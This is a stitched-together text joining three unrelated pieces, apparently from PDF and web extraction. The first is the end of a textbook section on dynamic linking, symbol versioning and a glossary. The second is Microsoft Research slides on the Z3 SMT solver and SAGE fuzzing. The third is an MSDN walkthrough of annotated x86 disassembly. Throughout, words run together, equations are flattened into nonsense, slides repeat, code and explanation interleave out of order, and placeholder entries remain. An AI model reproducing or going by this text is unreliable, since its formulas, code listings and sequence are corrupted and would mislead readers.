    $ gcc -L. -ltestver -o testver test.c
    
 60 $ LD_LIBRARY_PATH=. LD_PRELOAD=./liboverride.so ./testver
    libtest foo called
    
    100000574 l     F .text 00000054              foo
    000005c8 g     F .text 00000038              test_foo
 65 
                
In the simplest case as above, we simply state if the symbol is global or local. Thus in the case above
the foo function is most likely a support function for test_foo ; whilst we are happy for the overall
functionality of the test_foo  function to be overridden, if we do use the shared library version it needs
to have unaltered access nobody should modify the support function.
This allows us to keep our namespace  better organised. Many libraries might want to implement something
that could be named like a common function like read or write; however if they all did the actual version
given to the program might be completely wrong. By specifying symbols as local only the developer can be
Dynamic Linking
180sure that nothing will conflict with that internal name, and conversely the name he chose will not influence
any other program.
An extension of this scheme is symbol versioning . With this you can specify multiple versions of the same
symbol in the same library. The static linker appends some version information after the symbol name
(something like @VER) describing what version the symbol is given.
If the developer implements a function that has the same name but possibly a binary or programatically
different implementation he can increase the version number. When new applications are built against
the shared library, they will pick up the latest version of the symbol. However, applications built against
earlier versions of the same library will be requesting older versions (e.g. will have older @VER strings in
the symbol name they request) and thus get the original implementation. XXX : example
181Chapter 10. I/O Fundamentals
File System Fundamentals
File System Funamentals
Networking Fundamentals
Networking Fundamentals
182Computer Science from the Bottom Up
Glossary
A
Application Programming
InterfaceThe set of variables and functions used to communicate between different parts
of programs.
See Also Application Binary Interface .
Application Binary Interface A technical description of how the operating system should interface with
hardware.
See Also Application Programming Interface .
E
Extensible Markup Language Some reasonable definition here.
See Also Standardised Generalised Markup Language .
Standardised Generalised
Markup LanguageThe grand daddy of all documents
See Also Extensible Markup Language .
M
Mutually Exclusive When a number of things are mutually exclusive, only one can be valid at a time.
The fact that one of the things is valid makes the others invalid.
MMU The memory managment unit  component of the hardware architecture.
O
Open Source Software distributed in source form under licenses guaranteeing anybody rights to
freely use, modify, and redistribute the code.
S
Shell The interface used to interact with the operating system.Program Analysis and Testing 
using Satisfiability Modulo Theories
Yet another Conference
1 October 2012, Moscow
Nikolaj Bjørner
Senior Researcher
Microsoft Research
1
Agenda
Context : Software Engineering Research @ Microsoft
Application : Fuzzing and Test Case Generation
Application : Program Verification & Analysis
Technology : Z3 –An Efficient SMT Solver
Propaganda : Software Engineering Research Tools
2
An Efficient SMT Solver
Leonardo de Moura, Nikolaj Bjørner , Christoph WintersteigerTeamContext
3
Research in Software Engineering
Improve Software Development Productivity GroupContext
4
Context
Organization Microsoft Research5
Microsoft Research Labs
Sales,
Support ,
Marketing
~50000R & D
~40000Research :1%Context
6Company
Fuzzing and Test Case Generation
SAGE
Internal. For Security Fuzzing
Runs on x86 instructionsExternal. For Developers
Runs on .NET code
Try it on: http://pex4fun.com
Finding security bugs before the          hackers
black hat Application
7
Fuzzing and Test Case Generation
SAGE
Internal. For Security Fuzzing
Runs on x86 instructionsExternal. For Developers
Runs on .NET code
Try it on: http://pex4fun.com
Finding security bugs before the          hackers
black hat Dr. S trangelove ?
Bug: ***433
“2/29/2012 3:41 PM Edited by *****
SubStatus -> Local Fix
I think the fuzzers are starting to become sentient. 
We must crush them before it is too late.
In this case, the fuzzer figured out that if 
[X was between A and B then Y would get 
set to Z triggering U and V to happen......]
.....
And if this fuzzer asks for the nuclear launch 
codes, don’t tell it what they are ...”Application
8
SAGE by numbers
100sCPU -years -largest dedicated fuzz lab in the world
100s apps -fuzzed using SAGE
100s previously unknown bugs found
Billion+ computers updated with bug fixes
Millions of $saved for Users and Microsoft
10s of related tools (incl. Pex), 100s DART citations
3+ Billion constraints  -largest usage for any SMT solver
Adapted from [Patrice Godefroid, ISSTA 2010]
Application
9
Test case generation
unsigned GCD(x, y) {
requires (y > 0);
while (true) {
unsigned m = x % y;
if(m == 0) return y;
x = y;
y = m;
}
}Application
10
Test case generation
unsigned GCD(x, y) {
requires (y > 0);
while (true) {
unsigned m = x % y;
if(m == 0) return y;
x = y;
y = m;
}
}
We want a trace where the loop is 
executed twice.(y0> 0) and
(m0= x0% y0) and
not (m0= 0) and
(x1= y0) and
(y1= m0) and
(m1= x1% y1) and
(m1= 0)
SSAApplication
11
Test case generation
unsigned GCD(x, y) {
requires (y > 0);
while (true) {
unsigned m = x % y;
if(m == 0) return y;
x = y;
y = m;
}
}
We want a trace where the loop is 
executed twice.(y0> 0) and
(m0= x0% y0) and
not (m0= 0) and
(x1= y0) and
(y1= m0) and
(m1= x1% y1) and
(m1= 0)
Solverx0 = 2
y0= 4
m0= 2
x1 = 4
y1 = 2
m1= 0
SSAApplication
12
Execution 
Path
Run Test and Monitor Path Condition
Unexplored path Solve
seed
New input
Test
Inputs
Constraint 
System
Known
PathsT est Case Generation ProcedureApplication
13
Partners:
•European Microsoft Innovation Center
•Microsoft Research
•Microsoft’s Windows Division
•Universität des Saarlandes
co-funded by the 
German Ministry of Education and Research
http://www.verisoftxt.de
Hypervisor Verification (2007 –2010) with 
HardwareHypervisor
Application
14
Microsoft Verifying C Compiler
Application
15
Building VerveVerifiedC# compilerKernel.cs
Boogie/Z3
Translator/
AssemblerTAL checker
Linker/ISO generator
Verve.iso Source file
Compilation toolVerification tool
Nucleus.bpl (x86) Kernel.obj (x86)
9 person -monthsApplication
16Safe to the Last Instruction / Jean Yang & Chris 
Hawbliztl PLDI 2010
SMT: Satisfiability Modulo Theories
x2+y2<1andxy>0.1Technology
SMT: Satisfiability Modulo Theories
x2+y2<1andxy>0.1
 sat, x=1
8,y=7
8Solution/ModelTechnology
SMT: Satisfiability Modulo Theories
x2+y2<1andxy>0.1
 sat, x=1
8,y=7
8
x2+y2<1andxy>1Solution/ModelTechnology
SMT: Satisfiability Modulo Theories
x2+y2<1andxy>0.1
 sat, x=1
8,y=7
8
x2+y2<1andxy>1
 unsat , ProofSolution/ModelTechnology
SMT: Satisfiability Modulo Theories
x2+y2<1andxy>0.1
 sat, x=1
8,y=7
8
x2+y2<1andxy>1
 unsat , Proof
Is execution path Pfeasible? Is assertion Xviolated?
SAGE
Is Formula FSatisfiable (over Theory of Reals)?Solution/ModelTechnology
21
SMT: Satisfiability Modulo Theories
x2+y2<1andxy>0.1
 sat, x=1
8,y=7
8
x2+y2<1andxy>1
 unsat , Proof
Is execution path Pfeasible? Is assertion Xviolated?
SAGE
Is Formula FSatisfiable (over Theory of Reals)?
W
I
T
N
E
S
SSolution/ModelTechnology
22
x+2=y⇒fselectstorea,x,3,y−2=f(y−x+1)SMT: Satisfiability Modulo TheoriesTechnology
23
Arithmeticx+2=y⇒fselectstorea,x,3,y−2=f(y−x+1)SMT: Satisfiability Modulo TheoriesTechnology
24
Arithmetic
 Array Theory
select(storea,i,v,i)=v
i≠j⇒select(storea,i,v,j)=select(a,j)x+2=y⇒fselectstorea,x,3,y−2=f(y−x+1)SMT: Satisfiability Modulo TheoriesTechnology
25
Arithmetic
 Array Theory
Uninterpreted
Functions
select(storea,i,v,i)=v
i≠j⇒select(storea,i,v,j)=select(a,j)x+2=y⇒fselectstorea,x,3,y−2=f(y−x+1)SMT: Satisfiability Modulo TheoriesTechnology
26
Microsoft Tools using 
HAVOC
 SAGE
Vigilante
Z3 is used by many research groups 
More than 19k downloads
Z3 places 1stin most categories in SMT competitions
Technology
27
Microsoft Tools using 
HAVOC
 SAGE
Vigilante
Z3 is used by many research groups 
More than 19k downloads
Z3 places 1stin most categories in SMT competitions
Z3 solved more than 3 billion
constraints created by SAGE
Checking Win8 and Office.
Technology
28
Microsoft Tools using 
HAVOC
 SAGE
Vigilante
Z3 is used by many research groups 
More than 19k downloads
Z3 places 1stin most categories in SMT competitions
Z3 solved more than 3 billion
constraints created by SAGE
Checking Win8 and Office.
Z3 ships in 
Windows Server with the 
Static Driver Verifier
Technology
29
Microsoft Tools using 
HAVOC
 SAGE
Vigilante
Z3 is used by many research groups 
More than 19k downloads
Z3 places 1stin most categories in SMT competitions
Z3 solved more than 3 billion
constraints created by SAGE
Checking Win8 and Office.
Z3 ships in 
Windows Server with the 
Static Driver Verifier
Z3 used to check 
Azure Firewall Policies
Technology
30
Research Areas
Algorithms
Heuristics
Logic is “The Calculus of Computer Science ”  Zohar MannaTechnology
31Decidable Fragments
Research Areas
Algorithms
Heuristics
Undecidable (FOL + LIA )
Semi Decidable (FOL)
NEXPTIME (EPR)
PSPACE (QBF)
NP (SAT)
Logic is “The Calculus of Computer Science ”  Zohar MannaTechnology
32
Research Areas
Algorithms Decidable Fragments
Heuristics
Undecidable (FOL + LIA)
Semi Decidable (FOL)
NEXPTIME (EPR)
PSPACE (QBF)
NP (SAT)
Generalized array theory
Essentially Uninterpreted Formulas
Quantified Bit -Vector Logic
Logic is “The Calculus of Computer Science ”  Zohar MannaTechnology
33
Research Areas
Algorithms Decidable Fragments
Heuristics
Undecidable (FOL + LIA)
Semi Decidable (FOL)
NEXPTIME (EPR)
PSPACE (QBF)
NP (SAT)
Generalized array theory
Essentially Uninterpreted Formulas
Quantified Bit -Vector Logic
Practical problems often have 
structure that can be exploited.
Logic is “The Calculus of Computer Science ”  Zohar MannaTechnology
34
Little Engines of Proof
Freely available from http://research.microsoft.com/projects/z3
Technology
35
mc(x) = x -10 if x> 100
mc(x) = mc(mc(x+11))   if x 100
assert (x ≤ 101 mc(x) = 91)Research: Solving Horn Clauses
Krystof Hoder & Nikolaj Bjorner, SAT 2012
Bjorner, McMillan, Rybalchenko , SMT 2012
Technology
36
mc(x) = x -10 if x> 100
mc(x) = mc(mc(x+11))   if x 100
assert (x ≤ 101 mc(x) = 91)Research: Solving Horn Clauses
∀X.X>100mc(X,X−10)
∀X,Y,R.X≤100mc(X+11,Y) mc(Y,R) mc(X,R) 
∀X,R.mc(X,R) ∧X≤101→R=91
Solver finds solution for mc Krystof Hoder & Nikolaj Bjorner, SAT 2012
Bjorner, McMillan, Rybalchenko , SMT 2012
Technology
37
Research: Solving R Efficiently
A key idea: Use partial solution to guide the search
x3+2x2+3y2−5<0
x2+y2<1
−4xy−4x+y>1
Feasible Region
What is the core?
Dejan Jojanovich & Leonardo de Moura, IJCAR 2012
Technology
38
Research: Solving R Efficiently
A key idea: Use partial solution to guide the search
x3+2x2+3y2−5<0
x2+y2<1
−4xy−4x+y>1
Feasible Region
Starting search
Partial solution:
x=0.5
Can we extend it to y?What is the core?
Dejan Jojanovich & Leonardo de Moura, IJCAR 2012
Technology
39
Research: Solving R Efficiently
A key idea: Use partial solution to guide the search
x3+2x2+3y2−5<0
x2+y2<1
−4xy−4x+y>1
Feasible Region
Starting search
Partial solution:
x=0.5
Can we extend it to y?What is the core?
Dejan Jojanovich & Leonardo de Moura, IJCAR 2012
Technology
40
.comPropaganda
41
Core Expertise
Empirical 
Software EngineeringFoundations:
Logic
Program Analysis:
Performance, Reliability , 
SecurityProgramming Languages
Design & Implementation
Propaganda
42
Core Expertise
Empirical 
Software EngineeringFoundations:
Logic
Program Analysis:
Performance, Reliability , 
SecurityProgramming Languages
Design & Implementation
Propaganda
43
Core Expertise
Empirical 
Software EngineeringFoundations:
Logic
Program Analysis:
Performance, Reliability , 
SecurityProgramming Languages
Design & Implementation
Propaganda
44
45
http://rise4fun.com/z3py
Academic Interns
Propaganda
46
Summary
An outline of          –an efficient SMT solver
Efficient logic solver for SE tools tackling intractable problems
http://research.microsoft.com/projects/z3
Software Engineering Research @ Microsoft 
http://rise4fun.com
Academic internships
http://research.microsoft.com/en -us/jobs/intern
Contact
http://research.microsoft.com/~nbjorner
nbjorner@microsoft.com47
HomeLibraryLearnDownloadsSupportCommunityMSDN LibraryWindows DevelopmentDiagnosticsDebugging Tools for WindowsDebugging TechniquesProcessor ArchitectureThe x86 ProcessorAnnotated x86 DisassemblySign in |United States - English |PreferencesAnnotated x86DisassemblyThe following section will walk you through a disassemblyexample.Source CodeThe following is the code for the function that will be analyzed.
HRESULT CUserView::CloseView(void){    if (m_fDestroyed) return S_OK;    BOOL fViewObjectChanged = FALSE;    ReleaseAndNull(&m_pdtgt);    if (m_psv) {        m_psb‐>EnableModelessSB(FALSE);        if(m_pws) m_pws‐>ViewReleased();        IShellView* psv;        HWND hwndCapture = GetCapture();        if (hwndCapture && hwndCapture == m_hwnd) {            SendMessage(m_hwnd, WM_CANCELMODE, 0, 0);        }        m_fHandsOff = TRUE;        m_fRecursing = TRUE;        NotifyClients(m_psv, NOTIFY_CLOSING);        m_fRecursing = FALSE;        m_psv‐>UIActivate(SVUIA_DEACTIVATE);        psv = m_psv;        m_psv = NULL;        ReleaseAndNull(&_pctView);        if (m_pvo) {            IAdviseSink *pSink;            if (SUCCEEDED(m_pvo‐>GetAdvise(NULL, NULL, &pSink)) && pSink) {                if (pSink == (IAdviseSink *)this)                    m_pvo‐>SetAdvise(0, 0, NULL);                pSink‐>Release();            }            fViewObjectChanged = TRUE;            ReleaseAndNull(&m_pvo);        }        if (psv) {            psv‐>SaveViewState();            psv‐>DestroyViewWindow();            psv‐>Release();        }        m_hwndView = NULL;        m_fHandsOff = FALSE;        if (m_pcache) {Copy
Assembly CodeThis section contains the annotated disassembly example.Functions which use the ebp register as a frame pointer startout as follows:This sets up the frame so the function can access itsparameters as positive offsets from ebp, and local variables asnegative offsets.This is a method on a private COM interface, so the callingconvention is __stdcall. This means that parameters arepushed right to left (in this case, there are none), the "this"pointer is pushed, and then the function is called. Thus, uponentry into the function, the stack looks like this:After the two preceding instructions, the parameters areaccessible as:For a function that uses ebp as a frame pointer, the firstpushed parameter is accessible at [ebp+8]; subsequentparameters are accessible at consecutive higher DWORDaddresses.This function requires only two local stack variables, so a subesp, 8 instruction. The pushed values are then available as[ebp-4] and [ebp-8].        if (m_pcache) {            GlobalFree(m_pcache);            m_pcache = NULL;        }        m_psb‐>EnableModelessSB(TRUE);        CancelPendingActions();    }    ReleaseAndNull(&_psf);    if (fViewObjectChanged)        NotifyViewClients(DVASPECT_CONTENT, ‐1);    if (m_pszTitle) {        LocalFree(m_pszTitle);        m_pszTitle = NULL;    }    SetRect(&m_rcBounds, 0, 0, 0, 0);    return S_OK;}
HRESULT CUserView::CloseView(void)SAMPLE!CUserView__CloseView:71517134 55               push    ebp71517135 8bec             mov     ebp,espCopy
[esp+0] = return address[esp+4] = thisCopy
[ebp+0] = previous ebp pushed on stack[ebp+4] = return address[ebp+8] = thisCopy
71517137 51               push    ecx71517138 51               push    ecxCopy
For a function that uses ebp as a frame pointer, stack localvariables are accessible at negative offsets from the ebpregister.Now the compiler saves the registers that are required to bepreserved across function calls. Actually, it saves them in bitsand pieces, interleaved with the first line of actual code.It so happens that CloseView is a method on ViewState, whichis at offset 12 in the underlying object. Consequently, this is apointer to a ViewState class, although when there is possibleconfusion with another base class, it will be more carefullyspecified as (ViewState*)this.XORing a register with itself is a standard way of zeroing it out.The cmp instruction compares two values (by subtractingthem). The jz instruction checks if the result is zero, indicatingthat the two compared values are equal.The cmp instruction compares two values; a subsequent jinstruction jumps based on the result of the comparison.
The compiler delayed saving the EBX register until later in thefunction, so if the program is going to "early-out" on this test,then the exit path needs to be the one that does not restoreEBX.The execution of these two lines of code is interleaved, so payattention.The lea instruction computes the effect address of a memoryaccess and stores it in the destination. The actual memoryaddress is not dereferenced.71517139 56               push    esiCopy
7151713a 8b7508           mov     esi,[ebp+0x8]     ; esi = this7151713d 57               push    edi               ; save another registersCopy
    if (m_fDestroyed)7151713e 33ff             xor     edi,edi           ; edi = 0Copy71517140 39beac000000     cmp     [esi+0xac],edi    ; this‐>m_fDestroyed == 0?71517146 7407             jz      NotDestroyed (7151714f)  ; jump if equalCopy
    return S_OK;71517148 33c0             xor     eax,eax           ; eax = 0 = S_OK7151714a e972010000       jmp     ReturnNoEBX (715172c1) ; return, do not pop EBXCopy
    BOOL fViewObjectChanged = FALSE;    ReleaseAndNull(&m_pdtgt);Copy
NotDestroyed:7151714f 8d86c0000000     lea     eax,[esi+0xc0]    ; eax = &m_pdtgtCopy
The lea instruction takes the address of a variable.You should save that EBX register before it is damaged.Because you will be calling ReleaseAndNull frequently, it is agood idea to cache its address in EBX.
Remember that you zeroed out the EDI register a while backand that EDI is a register preserved across function calls (sothe call to ReleaseAndNull did not change it). Therefore, itstill holds the value zero and you can use it to quickly test forzero.
The above pattern is a telltale sign of a COM method call.COM method calls are pretty popular, so it is a good idea tolearn to recognize them. In particular, you should be able torecognize the three IUnknown methods directly from theirVtable offsets: QueryInterface=0, AddRef=4, and Release=8.
Indirect calls through globals is how function imports are71517155 53               push    ebxCopy71517156 8b1d10195071     mov ebx,[_imp__ReleaseAndNull]Copy
7151715c 50               push    eax               ; parameter to ReleaseAndNull7151715d 897dfc           mov     [ebp‐0x4],edi     ; fViewObjectChanged = FALSE71517160 ffd3             call    ebx               ; call ReleaseAndNull    if (m_psv) {71517162 397e74           cmp     [esi+0x74],edi    ; this‐>m_psv == 0?71517165 0f8411010000     je      No_Psv (7151727c) ; jump if zeroCopy
        m_psb‐>EnableModelessSB(FALSE);7151716b 8b4638           mov     eax,[esi+0x38]    ; eax = this‐>m_psb7151716e 57               push    edi               ; FALSE7151716f 50               push    eax               ; "this" for callee71517170 8b08             mov     ecx,[eax]         ; ecx = m_psb‐>lpVtbl71517172 ff5124           call    [ecx+0x24]        ; __stdcall EnableModelessSBCopy
        if(m_pws) m_pws‐>ViewReleased();71517175 8b8614010000     mov     eax,[esi+0x114]   ; eax = this‐>m_pws7151717b 3bc7             cmp     eax,edi           ; eax == 0?7151717d 7406             jz      NoWS (71517185) ; if so, then jump7151717f 8b08             mov     ecx,[eax]         ; ecx = m_pws‐>lpVtbl71517181 50               push    eax               ; "this" for callee71517182 ff510c           call    [ecx+0xc]         ; __stdcall ViewReleasedNoWS:        HWND hwndCapture = GetCapture();71517185 ff15e01a5071    call [_imp__GetCapture]    ; call GetCaptureCopy
implemented in Microsoft Win32. The loader fixes up theglobals to point to the actual address of the target. This is ahandy way to get your bearings when you are investigating acrashed machine. Look for the calls to imported functions andin the target. You will usually have the name of some importedfunction, which you can use to determine where you are in thesource code.
The function return value is placed in the EAX register.
Notice how you had to change your "this" pointer when callinga method on a different base class from your own.        if (hwndCapture && hwndCapture == m_hwnd) {            SendMessage(m_hwnd, WM_CANCELMODE, 0, 0);        }7151718b 3bc7             cmp     eax,edi           ; hwndCapture == 0?7151718d 7412             jz      No_Capture (715171a1) ; jump if zeroCopy
7151718f 8b4e44           mov     ecx,[esi+0x44]    ; ecx = this‐>m_hwnd71517192 3bc1             cmp     eax,ecx           ; hwndCapture = ecx?71517194 750b             jnz     No_Capture (715171a1) ; jump if not71517196 57               push    edi               ; 071517197 57               push    edi               ; 071517198 6a1f             push    0x1f              ; WM_CANCELMODE7151719a 51               push    ecx               ; hwndCapture7151719b ff1518195071     call    [_imp__SendMessageW] ; SendMessageNo_Capture:        m_fHandsOff = TRUE;        m_fRecursing = TRUE;715171a1 66818e0c0100000180 or    word ptr [esi+0x10c],0x8001 ; set both flags at once        NotifyClients(m_psv, NOTIFY_CLOSING);715171aa 8b4e20           mov     ecx,[esi+0x20]    ; ecx = (CNotifySource*)this.vtbl715171ad 6a04             push    0x4               ; NOTIFY_CLOSING715171af 8d4620           lea     eax,[esi+0x20]    ; eax = (CNotifySource*)this715171b2 ff7674           push    [esi+0x74]        ; m_psv715171b5 50               push    eax               ; "this" for callee715171b6 ff510c           call    [ecx+0xc]         ; __stdcall NotifyClientsCopy
        m_fRecursing = FALSE;715171b9 80a60d0100007f   and     byte ptr [esi+0x10d],0x7f        m_psv‐>UIActivate(SVUIA_DEACTIVATE);715171c0 8b4674           mov     eax,[esi+0x74]    ; eax = m_psv715171c3 57               push    edi               ; SVUIA_DEACTIVATE = 0715171c4 50               push    eax               ; "this" for callee715171c5 8b08             mov     ecx,[eax]         ; ecx = vtblCopy
The first local variable is psv.
Note that the compiler speculatively prepared the address ofthe m_pvo member, because you are going to use it frequentlyfor a while. Thus, having the address handy will result insmaller code.
Notice that the compiler concluded that the incoming "this"parameter was not required (because it long ago stashed thatinto the ESI register). Thus, it reused the memory as the localvariable pSink.If the function uses an EBP frame, then incoming parametersarrive at positive offsets from EBP and local variables are    ; ecx = vtbl715171c7 ff511c           call    [ecx+0x1c]        ; __stdcall UIActivate        psv = m_psv;        m_psv = NULL;715171ca 8b4674           mov     eax,[esi+0x74]    ; eax = m_psv715171cd 897e74           mov     [esi+0x74],edi    ; m_psv = NULL715171d0 8945f8           mov     [ebp‐0x8],eax     ; psv = eax        ReleaseAndNull(&_pctView);715171d3 8d466c           lea     eax,[esi+0x6c]    ; eax = &_pctView715171d6 50               push    eax               ; parameter715171d7 ffd3             call    ebx               ; call ReleaseAndNull        if (m_pvo) {715171d9 8b86a8000000     mov     eax,[esi+0xa8]    ; eax = m_pvo715171df 8dbea8000000     lea     edi,[esi+0xa8]    ; edi = &m_pvo715171e5 85c0             test    eax,eax           ; eax == 0?715171e7 7448             jz      No_Pvo (71517231) ; jump if zeroCopy
            if (SUCCEEDED(m_pvo‐>GetAdvise(NULL, NULL, &pSink)) && pSink) {715171e9 8b08             mov     ecx,[eax]         ; ecx = m_pvo‐>lpVtbl715171eb 8d5508           lea     edx,[ebp+0x8]     ; edx = &pSink715171ee 52               push    edx               ; parameter715171ef 6a00             push    0x0               ; NULL715171f1 6a00             push    0x0               ; NULL715171f3 50               push    eax               ; "this" for callee715171f4 ff5120           call    [ecx+0x20]        ; __stdcall GetAdvise715171f7 85c0             test    eax,eax           ; test bits of eax715171f9 7c2c             jl      No_Advise (71517227) ; jump if less than zero715171fb 33c9             xor     ecx,ecx           ; ecx = 0715171fd 394d08           cmp     [ebp+0x8],ecx     ; _pSink == ecx?71517200 7425             jz      No_Advise (71517227)Copy
placed at negative offsets. But, as in this case, the compiler isfree to reuse that memory for any purpose.If you are paying close attention, you will see that the compilercould have optimized this code a little better. It could havedelayed the lea edi, [esi+0xa8] instruction until after the twopush 0x0 instructions, replacing them with push edi. Thiswould have saved 2 bytes.These next several lines are to compensate for the fact that inC++, (IAdviseSink *)NULL must still be NULL. So if your "this"is really "(ViewState*)NULL", then the result of the cast shouldbe NULL and not the distance between IAdviseSink andIBrowserService.
Although the Pentium has a conditional move instruction, thebase i386 architecture does not, so the compiler uses specifictechniques to simulate a conditional move instruction withouttaking any jumps.The general pattern for a conditional evaluation is thefollowing:The neg r sets the carry flag if r is nonzero, because negnegates the value by subtracting from zero. And, subtractingfrom zero will generate a borrow (set the carry) if you subtracta nonzero value. It also damages the value in the r register,but that is acceptable because you are about to overwrite itanyway.Next, the sbb r, r instruction subtracts a value from itself,which always results in zero. However, it also subtracts thecarry (borrow) bit, so the net result is to set r to zero or -1,depending on whether the carry was clear or set, respectively.Therefore, sbb r, r sets r to zero if the original value of r waszero, or to -1 if the original value was nonzero.The third instruction performs a mask. Because the r register iszero or -1, "this" serves either to leave r zero or to change rfrom -1 to (val1 - val1), in that ANDing any value with -1leaves the original value.Therefore, the result of "and r, (val1 - val1)" is to set r to zeroif the original value of r was zero, or to "(val1 - val2)" if theoriginal value of r was nonzero.Finally, you add val2 to r, resulting in val2 or (val1 - val2) +                if (pSink == (IAdviseSink *)this)Copy
71517202 8d46ec           lea     eax,[esi‐0x14]    ; eax = ‐(IAdviseSink*)this71517205 8d5614           lea     edx,[esi+0x14]    ; edx = (IAdviseSink*)this71517208 f7d8             neg     eax               ; eax = ‐eax (sets carry if != 0)7151720a 1bc0             sbb     eax,eax           ; eax = eax ‐ eax ‐ carry7151720c 23c2             and     eax,edx           ; eax = NULL or edxCopy
        neg     r        sbb     r, r        and     r, (val1 ‐ val2)        add     r, val2Copy
val2 = val1.Thus, the ultimate result of this series of instructions is to set rto val2 if it was originally zero or to val1 if it was nonzero.This is the assembly equivalent of r = r ? val1 : val2.In this particular instance, you can see that val2 = 0 and val1= (IAdviseSink*)this. (Notice that the compiler elided thefinal add eax, 0 instruction because it has no effect.)Earlier in this section, you set EDI to the address of the m_pvomember. You are going to be using it now. You also zeroed outthe ECX register earlier.
All these COM method calls should look very familiar.The evaluation of the next two statements is interleaved. Donot forget that EBX contains the address of ReleaseAndNull.7151720e 394508           cmp     [ebp+0x8],eax ; pSink == (IAdviseSink*)this?71517211 750b             jnz     No_SetAdvise (7151721e) ; jump if not equalCopy
                    m_pvo‐>SetAdvise(0, 0, NULL);71517213 8b07             mov     eax,[edi]         ; eax = m_pvo71517215 51               push    ecx               ; NULL71517216 51               push    ecx               ; 071517217 51               push    ecx               ; 071517218 8b10             mov     edx,[eax]         ; edx = m_pvo‐>lpVtbl7151721a 50               push    eax               ; "this" for callee7151721b ff521c           call    [edx+0x1c]        ; __stdcall SetAdviseNo_SetAdvise:                pSink‐>Release();7151721e 8b4508           mov     eax,[ebp+0x8]     ; eax = pSink71517221 50               push    eax               ; "this" for callee71517222 8b08             mov     ecx,[eax]         ; ecx = pSink‐>lpVtbl71517224 ff5108           call    [ecx+0x8]         ; __stdcall ReleaseNo_Advise:Copy
            fViewObjectChanged = TRUE;            ReleaseAndNull(&m_pvo);71517227 57               push    edi               ; &m_pvo71517228 c745fc01000000   mov     dword ptr [ebp‐0x4],0x1 ; fViewObjectChanged = TRUE7151722f ffd3             call    ebx               ; call ReleaseAndNullNo_Pvo:        if (psv) {71517231 8b7df8           mov     edi,[ebp‐0x8]     ; edi = psv71517234 85ff             test    edi,edi           ; edi == 0?71517236 7412             jz      No_Psv2 (7151724a) ; jump if zero            psv‐>SaveViewState();71517238 8b07             mov     eax,[edi]         ; eax = psv‐>lpVtbl7151723a 57               push    edi           Copy
Here are more COM method calls.
ANDing a memory location with zero is the same as setting it tozero, because anything AND zero is zero. The compiler usesthis form because, even though it is slower, it is much shorterthan the equivalent mov instruction. (This code was optimizedfor size, not speed.)
In order to call CancelPendingActions, you have to movefrom (ViewState*)this to (CUserView*)this. Note also thatCancelPendingActions uses the __thiscall calling conventioninstead of __stdcall. According to __thiscall, the "this" pointer ispassed in the ECX register instead of being passed on the stack.7151723a 57               push    edi               ; "this" for callee7151723b ff5034           call    [eax+0x34]        ; __stdcall SaveViewState            psv‐>DestroyViewWindow();7151723e 8b07             mov     eax,[edi]         ; eax = psv‐>lpVtbl71517240 57               push    edi               ; "this" for callee71517241 ff5028           call    [eax+0x28]        ; __stdcall DestroyViewWindow            psv‐>Release();71517244 8b07             mov     eax,[edi]         ; eax = psv‐>lpVtbl71517246 57               push    edi               ; "this" for callee71517247 ff5008           call    [eax+0x8]         ; __stdcall ReleaseNo_Psv2:        m_hwndView = NULL;7151724a 83667c00         and     dword ptr [esi+0x7c],0x0 ; m_hwndView = 0Copy
        m_fHandsOff = FALSE;7151724e 83a60c010000fe   and     dword ptr [esi+0x10c],0xfe        if (m_pcache) {71517255 8b4670           mov     eax,[esi+0x70]    ; eax = m_pcache71517258 85c0             test    eax,eax           ; eax == 0?7151725a 740b             jz      No_Cache (71517267) ; jump if zero            GlobalFree(m_pcache);7151725c 50               push    eax               ; m_pcache7151725d ff15b4135071     call    [_imp__GlobalFree]    ; call GlobalFree            m_pcache = NULL;71517263 83667000         and     dword ptr [esi+0x70],0x0 ; m_pcache = 0No_Cache:        m_psb‐>EnableModelessSB(TRUE);71517267 8b4638           mov     eax,[esi+0x38]    ; eax = this‐>m_psb7151726a 6a01             push    0x1               ; TRUE7151726c 50               push    eax               ; "this" for callee7151726d 8b08             mov     ecx,[eax]         ; ecx = m_psb‐>lpVtbl7151726f ff5124           call    [ecx+0x24]        ; __stdcall EnableModelessSB        CancelPendingActions();Copy
Copy
Remember that EDI is still zero and EBX is still &m_pszTitle,because those registers are preserved by function calls.
Notice that you do not need the value of "this" any more, so thecompiler uses the add instruction to modify it in place insteadof using up another register to hold the address. This is actuallya performance win due to the Pentium u/v pipelining, because71517272 8d4eec           lea     ecx,[esi‐0x14]    ; ecx = (CUserView*)this71517275 e832fbffff       call CUserView::CancelPendingActions (71516dac) ; __thiscall    ReleaseAndNull(&_psf);7151727a 33ff             xor     edi,edi           ; edi = 0 (for later)No_Psv:7151727c 8d4678           lea     eax,[esi+0x78]    ; eax = &_psf7151727f 50               push    eax               ; parameter71517280 ffd3             call    ebx               ; call ReleaseAndNull    if (fViewObjectChanged)71517282 397dfc           cmp     [ebp‐0x4],edi     ; fViewObjectChanged == 0?71517285 740d             jz      NoNotifyViewClients (71517294) ; jump if zero       NotifyViewClients(DVASPECT_CONTENT, ‐1);71517287 8b46ec           mov     eax,[esi‐0x14]    ; eax = ((CUserView*)this)‐>lpVtbl7151728a 8d4eec           lea     ecx,[esi‐0x14]    ; ecx = (CUserView*)this7151728d 6aff             push    0xff              ; ‐17151728f 6a01             push    0x1               ; DVASPECT_CONTENT = 171517291 ff5024           call    [eax+0x24]        ; __thiscall NotifyViewClientsNoNotifyViewClients:    if (m_pszTitle)71517294 8b8680000000     mov     eax,[esi+0x80]    ; eax = m_pszTitle7151729a 8d9e80000000     lea     ebx,[esi+0x80]    ; ebx = &m_pszTitle (for later)715172a0 3bc7             cmp     eax,edi           ; eax == 0?715172a2 7409             jz      No_Title (715172ad) ; jump if zero        LocalFree(m_pszTitle);715172a4 50               push    eax               ; m_pszTitle715172a5 ff1538125071     call   [_imp__LocalFree]        m_pszTitle = NULL;Copy
715172ab 893b             mov     [ebx],edi         ; m_pszTitle = 0No_Title:    SetRect(&m_rcBounds, 0, 0, 0, 0);715172ad 57               push    edi               ; 0715172ae 57               push    edi               ; 0715172af 57               push    edi               ; 0715172b0 81c6fc000000     add     esi,0xfc          ; esi = &this‐>m_rcBounds715172b6 57               push    edi               ; 0715172b7 56               push    esi               ; &m_rcBounds715172b8 ff15e41a5071     call   [_imp__SetRect]Copy
© 2010 Microsoft Corporation. All rights reserved.  Terms of Use | Trademarks | Privacy Statement | Feedbackthe v pipe can do arithmetic, but not address computations.Finally, you restore the registers you are required to preserve,clean up the stack, and return to your caller, removing theincoming parameters.
